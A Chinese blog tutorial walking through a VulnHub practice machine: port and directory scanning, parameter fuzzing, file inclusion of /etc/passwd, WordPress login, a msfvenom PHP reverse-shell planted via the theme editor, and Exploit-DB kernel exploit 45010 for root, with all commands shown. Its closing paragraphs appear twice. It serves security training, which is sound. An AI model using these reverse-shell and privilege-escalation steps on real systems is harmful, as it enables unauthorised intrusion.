[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)

1 篇文章 1 订阅
订阅专栏

在这里插入图片描述

靶机地址

实验目的:掌握渗透测试基本流程和渗透工具

涉及渗透工具知识点

  • dirb 扫描web路径

  • fuzz获取url正确参数名

  • msf漏洞检索和利用

  • WordPress上传文件漏洞,反弹

已知渗透信息:

靶机安装在vmvare虚拟机中,使用NAT模式,网段192.168.31.0/24中

image-20230701114859290

攻击主机:kali linux主机

渗透目的:

  • 进入系统,获取靶机flag

1.主机发现,确定攻击目标

nmap方式(也可用命令行)得到主机ip:192.168.31.100,真实渗透环境肯定扫描出多个主机,需要收集多种渗透信息,分别

image-20230701114717386

2.端口发现,寻找突破口

#对全端口扫描
nmap -p 1-65535 -T4 -A -v 192.168.31.100

image-20230701120554163

3.web渗透

根据扫描出的服务,从易入侵的web服务开始继续渗透

image-20230701121115354

遇到web有什么渗透思路:

  • 目录扫描
  • 请求参数fuzz
  • 尝试访问敏感文件robots.txt
  • 用户名和密码爆破
  • 看网页源码(看有没有信息可利用)

在信息安全领域中,Fuzzing(模糊测试)是一种常用的黑盒测试技术,也是信息收集的一种方法之一。Fuzzing通过向目标系统输入大量随机数据来测试系统的鲁棒性和安全性。Fuzz测试通常涉及构建一个能够生成大量随机数据的程序,然后将这些数据发送到目标系统或应用程序中,以发现潜在的漏洞或错误。

在信息收集中,Fuzzing通常用于测试网络服务或应用程序的漏洞和弱点。通过向目标服务器发送各种类型的随机数据,可以发现一些潜在的漏洞和安全问题,例如缓冲区溢出、拒绝服务攻击、SQL注入等。Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。

总之,Fuzzing是一种非常有用的信息收集技术,可以帮助安全专业人员发现潜在的安全问题和漏洞。但需要注意的是,Fuzzing可能会导致目标系统崩溃或不稳定,因此在实施Fuzzing时需要谨慎,并遵循相关的道德和法律规范。

dirb扫描web目录

└─# dirb http://192.168.31.100/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul  1 00:37:21 2023
URL_BASE: http://192.168.31.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.31.100/ ----
+ http://192.168.31.100/dev (CODE:200|SIZE:131)                                                                                                  
+ http://192.168.31.100/index.php (CODE:200|SIZE:136)                                                                                            
==> DIRECTORY: http://192.168.31.100/javascript/                                                                                                 
+ http://192.168.31.100/server-status (CODE:403|SIZE:279)                                                                                        
==> DIRECTORY: http://192.168.31.100/wordpress/                                                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/javascript/ ----
==> DIRECTORY: http://192.168.31.100/javascript/jquery/                                                                                          
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/ ----
+ http://192.168.31.100/wordpress/index.php (CODE:301|SIZE:0)                                                                                    
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/                                                                                         
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/                                                                                       
==> DIRECTORY: http://192.168.31.100/wordpress/wp-includes/                                                                                      
+ http://192.168.31.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/javascript/jquery/ ----
+ http://192.168.31.100/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                          
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/ ----
+ http://192.168.31.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                           
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/css/                                                                                     
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/images/                                                                                  
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/includes/                                                                                
+ http://192.168.31.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                           
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/js/                                                                                      
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/maint/                                                                                   
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/network/                                                                                 
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/user/                                                                                    
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/ ----
+ http://192.168.31.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                         
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/plugins/                                                                               
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/themes/                                                                                
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/uploads/                                                                               
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/network/ ----
+ http://192.168.31.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                   
+ http://192.168.31.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/user/ ----
+ http://192.168.31.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                      
+ http://192.168.31.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                      
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/plugins/ ----
+ http://192.168.31.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                 
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/themes/ ----
+ http://192.168.31.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Jul  1 00:38:39 2023
DOWNLOADED: 46120 - FOUND: 15

web内容扫描中得出,此靶机对外提供wordpress服务,通过访问url路径得到几个有用路径信息:

  • http://192.168.31.100/dev (CODE:200|SIZE:131)
  • ==> DIRECTORY: http://192.168.31.100/wordpress/

image-20230701124219966

image-20230701125840531

给出了提示:用fuzz工具和找出正确参数,接着传入参数值location.txt继续下一步

fuzz获取正确url参数

fuzz的用法:

  • 找到url参数
  • sql注入
  • 密码暴力破解
  • 绕过waf
#用参数字典访问网站,得到返回状态码、行数、字符数等统计信息,在统计信息中找出不同于其它的访问结果,拿到正确的参数
#第一遍访问获取请求返回统计信息
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt  http://192.168.31.100/index.php?FUZZ
#第二遍访问通过参数过滤出不同与其它哪项,参数 --hw 12 从第一次访问中等到返回字数12
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt  --hw 12 http://192.168.31.100/index.php?FUZZ

Xshell_LNKCU7Onsy

找到正确参数file,根据提示访问

image-20230701130219673

拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。

Xshell_r4kDR6uvhE

根据提示得到关键字“follow_the_ippsec”,哪这个关键字和什么有关?目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息

WordPress漏洞利用

获取wordpress用户名

**方式一:**经验获取用户名

WordPress搭建成功后自动发布一封有用户名的文章,因此得到wordpress登录用户名为victor

image-20230701132408120

尝试用账户和关键词密码发现可以登录:

Xshell_FTpAnU07mw

接下来就针对WordPress渗透发现侵入系统的漏洞

方式二:指纹工具获取WordPress用户

关于WordPress的指纹工具

  • wpscan

image-20230701133027026

  • cmseek

cmseek安装:

apt-get update

apt-get install -y cmseek

wpscan枚举WordPress用户也得到用户victor

image-20230701133834449

#枚举WordPress用户完整输出

# wpscan --url http://192.168.31.100/wordpress -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.31.100/wordpress/ [192.168.31.100]
[+] Started: Sat Jul  1 01:32:10 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.31.100/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.31.100/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.31.100/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.31.100/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.31.100/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://192.168.31.100/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] victor
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jul  1 01:32:12 2023
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.91 KB
[+] Data Received: 20.512 MB
[+] Memory used: 168.305 MB
[+] Elapsed time: 00:00:02

4.文件上传,反弹连接

登录进入后,如何开始WordPress渗透?

  • 文件上传漏洞

image-20230701134850255

生成反弹连接脚本:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=6666 -o shell.php

image-20230701140542855

在wordpress中利用主题编辑功能对当前主题编辑,找到可编辑的php文件(图中如secret.php),然后粘贴上述生成的反弹连接php

image-20230701141016847

在kali linux 中用msfconsole命令启动监听6666的任务

image-20230701142451205

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.31.101
lhost => 192.168.31.101
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit

当访问

http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/secret.php (这是主题访问路径文件访问方式,记得路径就行,这是WordPress目录结构规范)

chrome_YoHLqb1ZAU

到此可以执行在目标机器上执行一部分命令,通过sysinfo命令得知系统版本时ubuntu16.04.2

image-20230701144138909

5.msf提权

接下来就是提权操作,执行更多命令

提权思路:

image-20230701142717179

如下演示通过msf操作系统漏洞数据库,漏洞利用获取权限

msfconsole 中执行:

searchsploit 16.04 Ubuntu

image-20230701144517639

根据内核版本得到可利用的漏洞,编译漏洞利用程序:

/usr/share/exploitdb/exploits/linux/local/45010.c

并上传靶机可执行路径/tmp下,执行即可提权

在kali-linux 上编译提权程序

cp /usr/share/exploitdb/exploits/linux/local/45010.c /root
cd /root
gcc 45010.c -o 45010   # 由于gcc版本问题,编译后在靶机上执行会报错,见下面解决

msconsole中执行:

  • upload上传
  • shell中执行45010提权程序

执行报错:./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34’ not found (required by ./45010)

image-20230701153849477

解决gcc编译版本问题:

通过反弹shell查看靶机glibc版本:

ldd --version

image-20230701154635776

在kali-linux上

image-20230701154750357

apt-get install -y autoconf
git clone https://github.com/NixOS/patchelf.git
cd patchelf
./bootstrap.sh 
./configure
make
make check
sudo make install

PatchELF是一个简单的实用程序,用于修改现有的ELF可执行文件和库。具体而言,它可以执行以下操作:

  • 更改可执行文件的动态加载程序(“ELF 解释器”):

    $ patchelf --set-interpreter /lib/my-ld-linux.so.2 my-program
    
  • 更改可执行文件和库 RPATH

    $ patchelf --set-rpath /opt/my-libs/lib:/other-libs my-program
    
  • 缩小可执行文件和库 RPATH

    $ patchelf --shrink-rpath my-program
    

通过glibc-all-in-one库下载靶机对应版本gcc编译环境:

image-20230701160121252

gcc -Wl,-rpath='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64',-dynamic-linker='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-linux-x86-64.so.2' -s  45010.c -o 45010V2

image-20230701160911557

重新上传并执行

image-20230701164915441

不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!芭比Q!

不过使用kali linux 2021-02-08后成功提权。也验证的一个事:有时新版kali linux能用上新工具,对于旧漏洞脚本不一定兼容,准备一个低版本的kali linux也是必要。

image-20230701165133855

提权效果

image-20230701165425826

图中靶机ip变为192.168.31.102,因为dhcp重新分配了ip,不影响

靶机一般在root用户放置flag文件,用提权root账号就可以获取flag,打靶完成!!!

image-20230701165657797

不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!芭比Q!

不过使用kali linux 2021-02-08后成功提权。也验证的一个事:有时新版kali linux能用上新工具,对于旧漏洞脚本不一定兼容,准备一个低版本的kali linux也是必要。

image-20230701165133855

提权效果

image-20230701165425826

图中靶机ip变为192.168.31.102,因为dhcp重新分配了ip,不影响

靶机一般在root用户放置flag文件,用提权root账号就可以获取flag,打靶完成!!!

image-20230701165657797

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
靶场练习第十八天~vulnhub靶场之hackableII
qq_57976347的博客
02-17 665
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 正在上传…重新上传取消 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -sC -A -p- 192.168.101.124 2.网站信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2414
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
渗透入门靶场大盘点(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
wholeliubei的博客
07-23 1461
如何学习网络安全写给新手朋友入门,有了靶场丰富自己思路,也巩固自己的技术当然新手老手都可以玩玩。这期盘点渗透靶场,排名不分前后还有其他靶场欢迎留言提出!本期是盘点入门必刷后期会盘点圈内所有的靶场以及靶场的writeup欢迎在评论区留言互动!
渗透测试练习靶场汇总
热门推荐
Thunderclap的博客
07-01 1万+
渗透测试 练习常用靶场汇总
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 587
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2661
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
VulnHub靶场LupinOne
I夜白
02-01 5030
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1412
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 531
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2377
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1384
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub渗透测试实战靶场 - TOPHATSEC: FRESHLY
LYJ20010728的博客
08-06 578
VulnHub渗透测试实战靶场 - TOPHATSEC: FRESHLY环境下载TOPHATSEC: FRESHLY靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 TOPHATSEC: FRESHLY靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集
VulnHub渗透测试实战靶场 - Odin:1
LYJ20010728的博客
08-25 531
VulnHub渗透测试实战靶场 - Odin:1题目描述环境下载NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from
VulnHub渗透测试实战靶场 - BSIDES VANCOUVER: 2018
LYJ20010728的博客
08-08 801
VulnHub渗透测试实战靶场 - BSIDES VANCOUVER: 2018环境下载BSIDES VANCOUVER: 2018靶机搭建渗透测试信息搜集漏洞挖掘方法一方法二getshell方法一提权方法一 环境下载 戳此进行环境下载 BSIDES VANCOUVER: 2018靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualB
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1713
Vulnhub靶场Prime_Series_Level-1渗透
vulnhub靶场-Nagini
qq_42947816的博客
11-01 1951
Nagini 是 HarryPotter VM 系列的第二个 VM,您需要在其中找到隐藏在机器内的 3 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort
渗透测试靶场
菜鸟-传奇
10-24 7360
渗透测试靶场 sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用下载地址:http://xss-quiz.int21h...
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)进行漏洞利用。 - 使用MSF命令进行简单命令介绍和搜索Drupal 7的漏洞。 - 在MSF控制台中搜索drupal模块,并选择合适的模块进行测试。 - 设置靶机IP并运行相应的漏洞利用模块。 - 获取反弹shell或执行命令,并查找flag文件。 5. 登录站点:使用获取到的凭证登录站点并进一步探索和查找flag文件。 请注意,以上步骤仅提供了通关vulnhub靶场的大致思路,具体操作和漏洞利用可能因不同的靶场环境而有所不同。因此,确保在进行任何渗透测试操作之前,遵守法律和道德准则,并获得合法的授权。
写文章

热门文章

  • 代码审查工具SonarQube详解 6410
  • 高效学习k8s 对象yaml文件编写,只需要2个工具 2076
  • [渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤) 1919
  • 【实践】Jenkins+gitlab自动化部署java应用(适合初学者) 1259
  • gitlab16.0结合gitlab-runner体验 1122

分类专栏

  • 渗透测试实践 1篇
  • 应用服务笔记 3篇
  • 网络安全 3篇
  • k8s1.27实践 6篇
  • devops 6篇
  • 编程效率工具 3篇
  • 监控 1篇

最新评论

  • 高效学习k8s 对象yaml文件编写,只需要2个工具

    CSDN-Ada助手: 恭喜您写了这篇关于高效学习k8s对象yaml文件编写的博客!看到标题就觉得很有用,期待能够从中学到更多的知识。同时,建议您可以继续分享一些实战经验,例如如何解决一些常见的问题,或者如何应对一些具有挑战性的场景。期待您的下一篇文章! CSDN 正在通过评论红包奖励优秀博客,请看红包流:https://bbs.csdn.net/?type=4&header=0&utm_source=csdn_ai_ada_blog_reply3,我们会奖励持续创作和学习的博主,请看:https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply3

  • 爱上window开发环境包管理---必备scoop

    CSDN-Ada助手: 恭喜你写了这么棒的一篇博客,介绍了scoop这个非常实用的window开发环境包管理工具。希望你能继续保持创作的热情,为我们带来更多有关开发环境的实用技巧和工具。下一篇博客不妨可以介绍一些实用的开发工具或者编程语言的使用技巧,让更多的人受益。再次祝贺你,期待你的下一篇博客。 CSDN 会根据你创作的前四篇博客的质量,给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply4 看奖励名单。

  • 网络基础必备知识

    CSDN-Ada助手: 恭喜您撰写了第20篇博客,题目为“网络基础必备知识”。您的博客内容一直以来都非常实用,对于我们这些对网络基础知识还不够熟悉的用户来说,十分有用。希望您能够继续保持创作的热情,为我们带来更多有价值的知识。同时,也建议您在未来的创作中,能够结合个人经验和实践,为我们带来更加深入的分析和思考。再次感谢您的付出和努力! CSDN 会根据你创作的博客的质量,给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply20 看奖励名单。

  • k8s集群包管理helm

    CSDN-Ada助手: 恭喜你写了第10篇博客!看到你在探讨k8s集群包管理helm的文章,我不禁想起自己也曾经在这个领域里摸爬滚打的经历。不过,你这篇文章写得非常棒!对helm的使用和优势,你做了非常详细的介绍,让我受益匪浅。接下来,我想提出一个创作建议,希望你能够尝试探讨一下helm的一些局限性和不足之处,或者是对于helm的集成和扩展方面的讨论。期待你的新作品! CSDN 会根据你创作的博客的质量,给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply10 看奖励名单。

  • k8s服务发现与暴露

    CSDN-Ada助手: 恭喜您写了第9篇博客,内容关于k8s服务发现与暴露的探讨非常精彩。您从多个角度深入分析了这个话题,让读者们深入了解了k8s服务发现与暴露的机制和原理。同时,您的写作风格也很清晰易懂,让读者们能够轻松理解和学习。 希望您能继续保持创作的热情,分享更多有价值的技术内容。下一步建议可以考虑从实践角度出发,分享您在实际应用中的经验和教训,对读者们的实践能力也会有很大的帮助。再次感谢您的分享,期待您更多的优秀作品! CSDN 会根据你创作的博客的质量,给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply9 看奖励名单。

最新文章

  • DNS必知
  • elasticsearch8.x知识梳理
  • 图文搞懂网络传输层TCP和UDP
2023年24篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

